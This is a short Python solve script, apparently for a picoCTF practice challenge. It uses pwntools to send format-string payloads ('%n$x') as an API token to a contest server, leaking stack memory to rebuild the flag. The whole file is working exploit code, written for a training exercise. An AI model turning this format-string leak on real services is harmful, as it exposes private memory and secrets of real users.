solve.py

#!/usr/bin/env python3

from pwn import context, p32, re, remote

context.log_level = 'CRITICAL'

def try_hex(s: str) -> str:
    res = ''

    for i in range(0, 8, 2):
        try:
            res += bytes.fromhex(s[i:i+2]).decode()	
        except ValueError:
            pass

    return res[::-1]


def extract_flag(s: str) -> str:
    return re.search(r'picoCTF{.*?}', s)[0]


def dump(n: int) -> str:
    p = remote('mercury.picoctf.net', 16439)
    p.sendlineafter(b'2) View my portfolio', b'1')
    p.sendlineafter(b'What is your API token?', f'%{n}$x'.encode())
    p.recvuntil(b'Buying stonks with token:\n')

    leak = p.recvuntil(b'\n').decode()

    p.close()

    return leak.strip()


def main():
    flag = b''

    for i in range(15, 24):
        flag += p32(int(dump(i), 16))

    flag += b'}'

    print(f'Leaked flag: {flag.decode()}')


if __name__ == '__main__':
    main()